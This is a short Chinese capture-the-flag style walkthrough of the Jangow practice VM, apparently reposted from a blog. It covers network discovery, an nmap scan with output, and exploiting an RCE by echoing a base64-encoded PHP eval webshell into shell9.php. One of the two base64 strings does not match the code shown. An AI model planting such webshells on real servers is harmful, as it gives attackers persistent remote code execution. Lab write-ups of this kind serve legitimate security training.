标签：1.13 渗透 base64 192.168 echo nmap jangow 靶机

今天给大家带来一个简单难度的靶机
首先主机扫描
netdiscover -i eth0 192.168.1.1/24
扫出靶机地址为
192.168.1.13
nmap 扫描
nmap -sV -p 0-6550 192.168.1.13

Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST
Nmap scan report for 192.168.1.13
Host is up (0.00071s latency).
Not shown: 6549 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
MAC Address: 00:0C:29:59:F7:8E (VMware)
Service Info: Host: 127.0.0.1; OS: Unix

直接访问80端口，发现busque页面存在rce

直接通过echo命令base64编码下写入一句话
将这段代码进行base64编码

<?php @eval($_POST['cmd']); ?>

PD9AZXZhbCgkX1BPU1RbJ21vb24nXSk7Pz4g
通过echo 命令写入
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Cj8+”|base64 -d >shell9.php

蚁剑连接,获取flag

标签：1.13,渗透,base64,192.168,echo,nmap,jangow,靶机
来源： https://blog.csdn.net/qq_42307546/article/details/122650957

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。